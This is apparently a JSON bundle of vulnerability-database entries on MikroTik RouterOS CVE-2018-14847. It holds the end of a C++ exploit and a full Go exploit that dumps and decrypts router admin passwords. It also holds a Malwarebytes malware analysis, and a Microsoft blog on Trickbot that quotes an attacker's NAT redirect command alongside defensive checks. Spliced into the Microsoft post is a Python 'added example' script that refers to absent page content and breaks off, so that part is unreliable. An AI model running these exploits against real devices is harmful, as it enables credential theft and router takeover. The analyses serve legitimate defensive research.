\nmproxy_session.send(msg); \n \nmsg.reset(); \nmproxy_session.receive(msg); \nif (msg.has_error()) \n{ \nstd::cout << \"[-] \" << msg.get_error_string() << std::endl; \nreturn false; \n} \n \nreturn true; \n} \n \nint main(int p_argc, const char** p_argv) \n{ \nstd::string ip; \nstd::string winbox_port; \nif (!parseCommandLine(p_argc, p_argv, ip, winbox_port)) \n{ \nreturn EXIT_FAILURE; \n} \n \nstd::cout << std::endl; \nstd::cout << \" aa a! a! aa!aa! a!aaa a| a|aaaa! a!\" << std::endl; \nstd::cout << \" a a(c)aaa!a a aaa$?aa$? 
aaaaaa$?aa!a\" << std::endl; \nstd::cout << \" aaa a' a' a' a'aaa aa(c)aa' a' a' \" << std::endl; \nstd::cout << std::endl; \n \n// step one - do the file disclosure \nstd::string user_dat(getPasswords(ip, winbox_port)); \nif (user_dat.empty()) \n{ \nreturn EXIT_FAILURE; \n} \n \n// step two - parse the password \nstd::string admin_username; \nstd::string admin_password; \nif (!get_password(user_dat, admin_username, admin_password)) \n{ \nstd::cout << \"[-] Failed to find admin creds. Trying default.\" << std::endl; \nadmin_username.assign(\"admin\"); \nadmin_password.assign(\"\"); \n} \n \nstd::cout << \"[+] Using credentials - \" << admin_username << \":\" << admin_password << std::endl; \n \n// step three - create the file \nif (!create_file(ip, winbox_port, admin_username, admin_password)) \n{ \nreturn EXIT_FAILURE; \n} \n \nstd::cout << \"[+] There's a light on\" << std::endl; \nreturn EXIT_SUCCESS; \n} \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149742/mikrotikrouteros-exec.txt"}, {"lastseen": "2018-08-18T01:54:27", "description": "", "cvss3": {}, "published": "2018-08-17T00:00:00", "type": "packetstorm", "title": "Mikrotik WinBox 6.42 Credential Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2018-08-17T00:00:00", "id": "PACKETSTORM:148958", "href": "https://packetstormsecurity.com/files/148958/Mikrotik-WinBox-6.42-Credential-Disclosure.html", "sourceData": "`/* \n \n# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition ) \n# Author: Maxim Yefimenko ( @slider ) \n# Date: 2018-08-06 \n# Software Link: https://mikrotik.com/download \n# Vendor Page: https://www.mikrotik.com/ \n# Version: 6.29 - 6.42 \n# Tested on: Fedora 28 \\ Debian 9 \\ Windows 10 \\ Android ( wherever it was possible to compile.. 
it's golang ^_^ ) \n# CVE: CVE-2018-14847 \n# References: \n# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/ \n# ( BasuCert ) https://github.com/BasuCert/WinboxPoC \n# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp \n# and special thanks to Dmitriy_Area51 \n \n*/ \n \npackage main \n \nimport ( \n\"crypto/md5\" \n\"fmt\" \n\"net\" \n\"os\" \n\"strings\" \n\"time\" \n) \n \nvar ( \na = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00, \n0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07, \n0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21, \n0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f, \n0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, \n0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, \n0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66, \n0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f, \n0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73, \n0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00, \n0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88, \n0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, \n0x00, 0x00} \n \nb = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00, \n0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01, \n0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08, \n0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09, \n0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, \n0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00, \n0x00, 0x02, 0x00, 0x00, 0x00} \n \nbuf = make([]byte, 1024*8) \n) \n \nfunc checkErr(err error) { \nif err != nil { \nfmt.Println(\"Error:\" + err.Error()) \n} \n} \n \nfunc decryptPassword(user []byte, passEnc []byte) string { \nvar passw []byte \nhasher := md5.New() \nhasher.Write(user) \nhasher.Write([]byte(\"283i4jfkai3389\")) \nkey := hasher.Sum(nil) \n \nfor i := 0; i < len(passEnc); i++ { \npassw = append(passw, passEnc[i]^key[i%len(key)]) \n} \n \nreturn string(ASCIIonly(passw)) \n} \n \nfunc ASCIIonly(s 
[]byte) []byte { \nfor i, c := range s { \nif c < 32 || c > 126 { \nreturn s[:i] \n} \n} \nreturn s \n} \n \nfunc extractPass(buff []byte) (s []string) { \nvar ( \nusr []byte \npwd []byte \n) \n \n//searching for StartOfRecord \nfor i := 0; i < len(buff); i++ { \n \nif i+2 >= len(buff) { \nbreak \n} \n \nif (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) { \n// fmt.Printf(\"Probably user record at offset 0x%.5x\\n\", i) \n \n//some bytes ahead is enable/disable flag \ni += int((buff[i+2] - 5)) \nif i >= len(buff) { \nbreak \n} \n \n//searching for StartOfRecNumber \nif i+3 >= len(buff) { \nbreak \n} \n \nfor !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) { \ni++ \nif i+3 >= len(buff) { \nbreak \n} \n} \n \ni += 4 \nif i >= len(buff) { \nbreak \n} \n// fmt.Printf(\"SORn: 0x%X\\n\", i) \n \n// comment? \ni += 18 \nif (i + 4) >= len(buff) { \nbreak \n} \nif (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) { \nif (i+1)+int(buff[i]) >= len(buff) { \nbreak \n} \ni += int(buff[i]) \n} else { \ni -= 18 \n} \n \n//searching for StartOfPassword \nif i+4 >= len(buff) { \nbreak \n} \n \nfor !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) { \ni++ \nif i+4 >= len(buff) { \nbreak \n} \n} \ni += 5 \nif (i + 3) >= len(buff) { \nbreak \n} \n \nif (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) { \npwd = buf[i-1+1 : int(buf[i-1])+i-1+1] \ni += int(buff[i-1]) \n} \n \n//searching for StartOfUsername \nif i+3 >= len(buff) { \nbreak \n} \nfor !((buff[i] == 0x01) && (buff[i+3] == 0x21)) { \ni++ \nif i+3 >= len(buff) { \nbreak \n} \n} \n \ni += 4 \nif i >= len(buff) { \nbreak \n} \nif buff[i] != 0x00 { \nif i+int(buff[i]) >= len(buff) { \nbreak \n} \n \nusr = 
ASCIIonly(buff[i+1 : int(buff[i])+i+1]) \ni += int(buff[i]) \n} \n \ndecrypted := decryptPassword(usr, pwd) \n//fmt.Printf(\" --> %s\\t%s\\n\", buff[i], decrypted) \n \nif len(usr) != 0 { \ns = append(s, strings.Join([]string{string(usr), string(decrypted)}, \":\")) \n} \n \n} \n} \n \nreturn s \n} \n \nfunc main() { \n \nif len(os.Args) < 2 { \nfmt.Printf(\" [ usage: %s 192.168.88.1\\n\\n\", os.Args[0]) \nos.Exit(0) \n} \n \nconn, err := net.DialTimeout(\"tcp\", os.Args[1]+\":8291\", time.Duration(3*time.Second)) \n \nif err != nil { \nfmt.Println(err.Error()) \nreturn \n} \n \ndefer conn.Close() \n \nconn.Write(a) \nreqLen, err := conn.Read(buf) \ncheckErr(err) \nif reqLen < 38 { \npanic(\"First packet is too small\") \n} \n \nb[19] = buf[38] \n \nconn.Write(b) \nreqLen, err = conn.Read(buf) \ncheckErr(err) \ndb := buf[:reqLen] \n \ns := extractPass(db) \nfor i, acc := range s { \ndata := strings.SplitN(acc, \":\", 2) \nfmt.Printf(\" [%d] %s\\t%s\\n\", i, data[0], data[1]) \n} \n} \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148958/mikrotikwinbox642-disclose.txt"}], "malwarebytes": [{"lastseen": "2018-10-15T22:23:26", "description": "_This blog post was authored by [@hasherezade](<https://twitter.com/hasherezade>) and [J\u00e9r\u00f4me Segura](<https://blog.malwarebytes.com/author/jeromesegura/>)._\n\nMikroTik, a Latvian company that makes routers and ISP wireless systems, has been dealing with several vulnerabilities affecting its products' operating system over the past few months. 
Ever since a critical flaw in RouterOS was [identified](<https://forum.mikrotik.com/viewtopic.php?t=133533>) in late April 2018, attacks have been going on at an alarming rate, made worse when a newly-found exploitation technique for [CVE-2018-14847](<https://www.exploit-db.com/exploits/45578/>) was identified.\n\nThe problem is that a large number of MikroTik routers remain unpatched and are prey for automated attacks, despite security fixes made available by the vendor. Criminals were quick to leverage Proof of Concept code to compromise hundreds of thousands of devices in a short time frame. Last summer, researchers at SpiderLabs [discovered](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/>) what was perhaps the biggest malicious Coinhive campaign via hacked MikroTik devices, which has evolved into a much wider problem now.\n\nWith this latest trick, users behind compromised routers are served a fake browser update page. When they run this malicious update, it unpacks code onto their computer that scans the Internet for other vulnerable routers and tries to exploit them.\n\n### Suspicious browser update\n\nSecurity researcher [@VriesHd](<https://twitter.com/VriesHd>) first spotted a new [campaign](<https://twitter.com/VriesHd/status/1049775664235208706>) attempting to further compromise vulnerable routers using a typical social engineering technique. 
Internet providers that operate infected MikroTik routers will serve this malicious redirect about an \"old version of the browser\" to their end users:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/fake_update.png> \"\" )\n\nAccording to a [search via Censys](<https://censys.io/ipv4?q=%22During+the+opening+of+the+site%22+AND+%22MikroTik+Device%22>), there are about 11,000 compromised MikroTik devices hosting this fake download page:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/censys_results.png> \"\" )\n\nThe alleged browser update is suspiciously downloaded from an FTP server, as seen below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/sourcecode.png> \"\" )\n\nInterestingly, this IP address is also listed as a free and open web proxy. Proxies are often used by those who wish to bypass certain country limitations (e.g. watching the American version of Netflix if you are not in the US) or simply as a way to mask their IP address.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/free_proxy.png> \"\" )\n\n### Payload analysis\n\n**Behavioral analysis**\n\nThe payload follows the theme of pretending to be an installer named _upd_browser_.\n\n\n\nWhen we deploy it, it pops up an error:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/error_popup_.png> \"\" )\n\nHowever, if we capture the network traffic, we can see that in the background it scans various IP addresses, trying to connect on port 8291 ([the default port for managing MikroTik routers via the Winbox application](<http://whatportis.com/ports/8291_winbox-default-on-a-mikrotik-routeros-for-a-windows-application-used-to-administer-mikrotik-routeros>)):\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/probing.png> \"\" )\n\n**Unpacking**\n\nThe dropped payload is a relatively big executable (7.25 MB) with a huge overlay. 
The sections' headers and their visualizations are given below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/sections_.png> \"\" )\n\nAs we can recognize by looking at the section names, it comes packed with a popular, simple packer: [UPX](<https://upx.github.io/>). The size of the overlay suggests that there is something more to be extracted. After further examination, we find out that it unpacks a Python DLL and other related files into the %TEMP% folder, and then loads them. At this point, it is easy to guess that this EXE is in reality a wrapped Python script. We can unpack it following the same procedure as the one described [here](<https://hshrzd.wordpress.com/2018/01/26/solving-a-pyinstaller-compiled-crackme/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/extracted_.png> \"\" )\n\nThe Entry Point is in the script named _upd_browser_. After decompiling and following the scripts, we find out that the malware's core consists of two Python scripts: [upd_browser.py](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py>) and [ups.py](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-ups-py>).\n\n**Inside the scripts**\n\nThe [main function of the module](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py-L95>) is pretty simple:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/main_func_.png> \"\" )\n\nAs we can see, [the error pop-up is hardcoded](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py-L97>): It does not alert about any actual error, but is used as a decoy.\n\nAfter that, the malware logs the IP address of the victim by querying a hardcoded address of a tracker made using a legitimate service, IP Logger. 
The tracker takes the form of a one pixel\u2013sized image:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/iplogger_.png> \"\" )\n\nLater, this address is queried repeatedly at a defined time interval.\n\nThe most important actions are performed in the function named \"[scan](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py-L75>)\" that is deployed in several parallel threads (the maximum number of threads is defined as thmax = 600). The function \"[scan](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py-L75>)\" generates pseudo-random IP addresses and tries to connect to each of them on the aforementioned port 8291. When the connection attempt succeeds, it tries another connection, this time on a random port from a range of 56778 to 56887. When this one fails, it proceeds with the exploitation: \n\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/scan_addrs_.png> \"\" )\n\nThe function \"[poc](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py-L5>)\" is meant to infect the router using known vulnerabilities. It starts by attempting to retrieve credentials leveraging the path traversal vulnerability (CVE-2018-14847):\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/get_user_pass_.png> \"\" )\n\nThe user.dat file is expected to be in M2 format, so the script comes with a built-in parser (function [load_file](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-ups-py-L117>)):\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/m2_parser_fragment-1.png> \"\" )\n\nIf retrieving the password from the user.dat file is successful, it decodes the credentials and uses them to create a backdoor: an account with a randomly-generated password. 
It also sets a scheduled task to be executed by the router.\n\nThe script that is set in the scheduler is generated from a hardcoded [template](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-ups-py-L30>) (cleaned version available [here](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-script_template-txt>)). Its role is to manipulate the router's settings and set up an error page [loading a CoinHive](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-script_template-txt-L41>) miner.\n\nThe error page can be dropped in two locations: \"[webproxy/error.html](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-script_template-txt-L42>)\" or \"[flash/webproxy/error.html](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-script_template-txt-L43>)\".\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/proxy_view.png> \"\" )\n\nSuch a page is displayed to users whenever they try to view a URL to which access is denied. But the malicious script configures the router in such a way that basically any HTTP request leads to the error page. Yet, the error page is crafted to spoof the original traffic, displaying the requested page as an iframe. So, users may browse most of the web as usual, without noticing the change. Example:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/coinhive_.png> \"\" )\n\nThe CoinHive miner is embedded in that page, so for as long as users browse, their machines are used for mining.\n\n### Mitigations\n\nMikroTik users are urged to patch their routers as soon as possible and should assume that their authentication credentials have been compromised if they are running an outdated version. 
MikroTik's [download page](<https://mikrotik.com/download>) explains how to perform an upgrade to RouterOS.\n\nA [blog post](<https://blog.mikrotik.com/security/winbox-vulnerability.html>) from the company about CVE-2018-14847 also advises users to restrict access to Winbox via the Firewall and make sure the configuration file is clean (this is usually where scripts or proxies would be injected).\n\nAwareness that these vulnerabilities exist and are easy to exploit is important considering that patching a router is not something many people are used to doing. However, in many cases users will not be able to do so unless their Internet Service Provider does it for them upstream.\n\nWith this latest social engineering scheme, we saw how criminals are trying to infect regular users and leverage their computer to scan the Internet for vulnerable routers. This technique is clever because such an effort requires time and resources to be efficient.\n\nMalwarebytes business customers and Premium consumer users are protected from this threat, as our anti-malware engine detects and blocks this fake browser update in real time:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/detection.png> \"\" )\n\nMalwarebytes Endpoint Protection blocks the malicious executable disguised as a browser update.\n\n### Indicators of compromise\n\nSample hash\n \n \n 57EB8C673FC6A351B8C15310E507233860876BA813ED6AC633E9AF329A0BBAA0\n\nCoinhive site keys\n \n \n oiKAGEslcNfjfgxTMrxKGMJvh436ypIM\n 5zHUikiwJT4MLzQ9PLbU11gEz8TLCcYx\n 5ROof564mEBQsYzCqee0M2LplLBEApCv\n qKoXV8jXlcUaIt0LGcMJIHw7yLJEyyVO\n ZsyeL0FvutbhhdLTVEYe3WOnyd3BU1fK\n ByMzv397Mzjcm4Tvr3dOzD6toK0LOqgf\n joy1MQSiGgGHos78FarfEGIuM5Ig7l8h\n ryZ1Dl4QYuDlQBMchMFviBXPL1E1bbGs\n jh0GD0ZETDOfypDbwjTNWXWIuvUlwtsF\n BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma\n\nThe post [Fake browser update seeks to compromise more MikroTik 
routers](<https://blog.malwarebytes.com/threat-analysis/2018/10/fake-browser-update-seeks-to-compromise-more-mikrotik-routers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-10-12T15:00:06", "type": "malwarebytes", "title": "Fake browser update seeks to compromise more MikroTik routers", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-10-12T15:00:06", "id": "MALWAREBYTES:1437FF0825AD10F9D61ABFE429326967", "href": "https://blog.malwarebytes.com/threat-analysis/2018/10/fake-browser-update-seeks-to-compromise-more-mikrotik-routers/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "mssecure": [{"lastseen": "2022-03-16T15:26:57", "description": "Trickbot, a sophisticated trojan that has evolved significantly since its discovery in 2016, has continually expanded its capabilities and, even with [disruption efforts](<https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/>) and news of its infrastructure going offline, it has 
managed to remain one of the most persistent threats in recent years. The malware\u2019s modular nature has allowed it to be increasingly adaptable to different networks, environments, and devices. In addition, it has grown to include numerous plug-ins, access-as-a-service backdoors for other malware like Ryuk ransomware, and mining capabilities. A significant part of its evolution also includes making its attacks and infrastructure more durable against detection, including continuously improving its persistence capabilities, [evading researchers and reverse engineering](<https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/>), and finding new ways to maintain the stability of its command-and-control (C2) framework.\n\nThis continuous evolution has seen Trickbot expand its reach from computers to Internet of Things (IoT) devices such as routers, with the malware updating its C2 infrastructure to [utilize MikroTik devices and modules](<https://orangecyberdefense.com/uk/blog/cyberdefense/the-trickbot-and-mikrotik-connection/>). [MikroTik](<https://mikrotik.com/>) routers are widely used around the world across different industries. By using MikroTik routers as proxy servers for its C2 servers and redirecting the traffic through non-standard ports, Trickbot adds another persistence layer that helps malicious IPs evade detection by standard security systems.\n\nThe Microsoft Defender for IoT research team has recently discovered the exact method through which MikroTik devices are used in Trickbot\u2019s C2 infrastructure. In this blog, we will share our analysis of the said method and provide insights on how attackers gain access to MikroTik devices and use compromised IoT devices in Trickbot attacks.\n\nThis analysis has enabled us to develop a forensic tool to identify Trickbot-related compromise and other suspicious indicators on MikroTik devices. 
We [published this tool](<https://github.com/microsoft/routeros-scanner>) to help customers ensure these IoT devices are not susceptible to these attacks. We\u2019re also sharing recommended steps for detecting and remediating compromise if found, as well as general prevention steps to protect against future attacks.\n\n_Figure 1. Trickbot attack diagram_\n\n## How attackers compromise MikroTik devices for Trickbot C2\n\nTrickbot\u2019s purpose in using MikroTik devices is to create a line of communication between the Trickbot-affected device and the C2 server that standard defense systems in the network are not able to detect. The attackers begin by hacking into a MikroTik router. They do this by acquiring credentials using several methods, which we will discuss in detail in the following section.\n\nThe attackers then issue a unique command that redirects traffic between two ports in the router, establishing the line of communication between Trickbot-affected devices and the C2. MikroTik devices have unique hardware and software, RouterBOARD and RouterOS. This means that to run such a command, the attackers need expertise in RouterOS SSH shell commands. We uncovered this attacker method by tracking traffic containing these SSH shell commands.\n\n_Figure 2. Direct line of communication between the Trickbot-infected device and the Trickbot C2_\n\n### Accessing the MikroTik device and maintaining access\n\nAttackers first need to access the MikroTik shell to run the routing commands. To do so, they need to acquire credentials. As mentioned earlier, based on our analysis, there are several methods that attackers use to access a target router:\n\n * **Using default MikroTik passwords.**\n * **Launching brute force attacks.** We have seen attackers use some unique passwords that probably were harvested from other MikroTik devices.\n * **Exploiting CVE-2018-14847 on devices with RouterOS versions older than 6.42. 
**This vulnerability gives the attacker the ability to read arbitrary files like _user.dat_, which contains passwords.\n\nTo maintain access, the attackers then change the affected router\u2019s password.\n\n### Redirecting traffic\n\nMikroTik devices have a unique Linux-based OS called RouterOS with a unique SSH shell that can be accessed through SSH protocol using a restricted set of commands. These commands can be easily identified by the prefix \u201c/\u201d. For example:\n \n \n /ip \n /system \n /tool\n\nThese commands usually won\u2019t have any meaning on regular Linux-based shells and are solely intended for MikroTik devices. We observed through Microsoft threat data the use of these types of commands. Understanding that these are MikroTik-specific commands, we were able to track their source and intent. For example, we observed attackers issuing the following commands:\n \n \n /ip firewall nat add chain=dstnat proto=tcp dst-port=449 to-port=80 action=dst-nat to-addresses=<infected device> dst-address=<real C2 address>\n\nFrom the command, we can understand the following:\n\n * A new rule, similar to iptables, is created\n * The rule redirects traffic from the device to a server\n * The redirected traffic is received from port 449 and redirected to port 80\n\nThe said command is a legitimate network address translation (NAT) command that allows the NAT router to perform IP address rewriting. In this case, it is being used for malicious activity. Trickbot is known for using ports 443 and 449, and we were able to verify that some target servers were identified as TrickBot C2 servers in the past.\n\nThis analysis highlights the importance of keeping IoT devices secure in today\u2019s ever evolving threat environment. 
Using Microsoft threat data, Microsoft\u2019s IoT and operational technology (OT) security experts established the exact methods that attackers use to leverage compromised IoT devices and gained knowledge that can help us better protect customers from threats.\n\n## Defending IoT devices against Trickbot attacks\n\nAs security solutions for conventional computing devices continue to evolve and improve, attackers will explore alternative ways to compromise target networks. Attacks against routers and other IoT devices are not new, and because these devices are usually unmanaged, they can easily be the weakest links in the network. Therefore, organizations should also consider these devices when implementing security policies and best practices.\n\n### An open-source tool for MikroTik forensics\n\nWhile investigating MikroTik devices and attacks in the wild, we observed several methods of attacking these devices in addition to the method described in this blog. We aggregated our knowledge of these methods and known CVEs into an open-source tool that can extract the forensic artifacts related to these attacks.\n\nSome of this tool\u2019s functionalities include the following:\n\n * Get the version of the device and map it to CVEs\n * Check for scheduled tasks\n * Look for traffic redirection rules (NAT and other rules)\n * Look for DNS cache poisoning\n * Look for changes to default service ports\n * Look for non-default users\n\nWe have [published the tool on GitHub](<https://github.com/microsoft/routeros-scanner>) and are sharing it with the broader community to encourage better intelligence-sharing in the field of IoT security and to help build better protections against threat actors abusing IoT devices.\n\n### How to detect, remediate, and prevent infections\n\nOrganizations with potentially at-risk MikroTik devices can perform the following detection and remediation steps:\n\n * Run the following command to detect whether the NAT rule was applied to the device (the tool performs this check as well):\n 
\n \n /ip firewall nat print\n\nA rule like the following may indicate infection:\n \n \n chain=dstnat action=dst-nat to-addresses=<public IP address> \n to-ports=80 protocol=tcp dst-address=<your MikroTik IP> dst-port=449 \n chain=srcnat action=masquerade src-address=<your MikroTik IP>\n\n * Run the following command to remove the potentially malicious NAT rule, using the rule number shown by the print command:\n \n \n /ip firewall nat remove numbers=<rule number to remove>\n\nTo prevent future infections, perform the following steps:\n\n * Change the default password to a strong one\n * Block TCP port 8291 (Winbox) from external access\n * Change the SSH port from the default (22)\n * Make sure routers are up to date with the latest firmware and patches\n * Use a secure virtual private network (VPN) service for remote access and restrict remote access to the router\n\n### Protect IoT devices and IT networks with Microsoft Defender\n\nTo harden IoT devices and IT networks against threats like Trickbot, organizations must implement solutions that detect malicious attempts to access devices and raise alerts on anomalous network behavior. [Microsoft Defender for IoT](<https://azure.microsoft.com/services/iot-defender/>) provides agentless, network-layer security that lets organizations deploy continuous asset discovery, vulnerability management, and threat detection for IoT, OT devices, and Industrial Control Systems (ICS) on-premises or in Azure-connected environments. It is updated regularly with indicators of compromise (IoCs) from threat research like that described in this blog, and rules to detect malicious activity.\n\nMeanwhile, [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>) protects against attacks related to highly modular, multi-stage malware like Trickbot by coordinating threat data across identities, endpoints, cloud apps, email, and documents. 
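As an added example (not code from the blog post or from the routeros-scanner tool), the following Python script performs two of the checks listed above offline, over output pasted from the router: it maps a RouterOS version string to the CVE-2018-14847 ranges per release channel (the ranges are the ones given in the Tenable exploit header and the Metasploit wrap-up further down this page), and it parses `/ip firewall nat print` output to flag dst-nat rules matching the Trickbot pattern and emit the matching `remove` command. The sample print output is constructed and uses documentation address ranges; the function names are the example's own.

```python
"""Offline triage of MikroTik RouterOS command output for two of the checks
the post lists for its scanner: mapping the RouterOS version to
CVE-2018-14847, and finding the dst-nat rule Trickbot uses to relay C2.

Added example; not code from the Microsoft blog post or from the
routeros-scanner tool. The version ranges are the ones given per release
channel in the Tenable exploit header and the Metasploit wrap-up further
down this page. The sample print output is constructed, not a real capture.
"""
import re
from ipaddress import ip_address, ip_network


def parse_version(text):
    """Turn '6.42.1', '6.42' or '6.43rc3' into a comparable tuple
    (major, minor, patch, is_final, rc) so that 6.43rc3 < 6.43 < 6.43.1."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:rc(\d+))?", text.strip())
    if not m:
        raise ValueError("unrecognised RouterOS version: %r" % text)
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if rc else 1, int(rc or 0))


# Vulnerable ranges for CVE-2018-14847 per release channel (this page's figures).
VULN_RANGES = {
    "long-term": (parse_version("6.30.1"), parse_version("6.40.7")),
    "stable": (parse_version("6.29"), parse_version("6.42")),
    "testing": (parse_version("6.29rc1"), parse_version("6.43rc3")),
}


def cve_2018_14847_channels(version, channel=None):
    """Return the channels whose vulnerable range contains `version`
    (an empty list means it falls outside every applicable range).

    The ranges overlap numerically: 6.40.8 is a fixed long-term build yet
    sorts below 6.42, so a plain "< 6.42.1" test over-reports. Pass the
    channel from '/system package update print' when it is known; without
    it, an rc build is checked only against 'testing' and a release build
    against both 'stable' and 'long-term', which errs on the side of
    flagging."""
    v = parse_version(version)
    if channel is not None:
        candidates = [channel]
    elif v[3] == 0:
        candidates = ["testing"]
    else:
        candidates = ["stable", "long-term"]
    return [c for c in candidates if VULN_RANGES[c][0] <= v <= VULN_RANGES[c][1]]


# Targets of an ordinary port-forward; anything else counts as remote.
LAN_NETWORKS = [ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
TRICKBOT_PORTS = {"443", "449"}  # the ports the post says Trickbot is known to use


def parse_nat_rules(print_output):
    """Parse '/ip firewall nat print' output: one rule per line, starting with
    the rule index, optional flag letters (X disabled, I invalid, D dynamic)
    and key=value pairs. The 'Flags:' legend and blank lines are skipped."""
    rules = []
    for line in print_output.splitlines():
        m = re.match(r"\s*(\d+)\s+([XID]*)\s*(.*)$", line)
        if not m:
            continue
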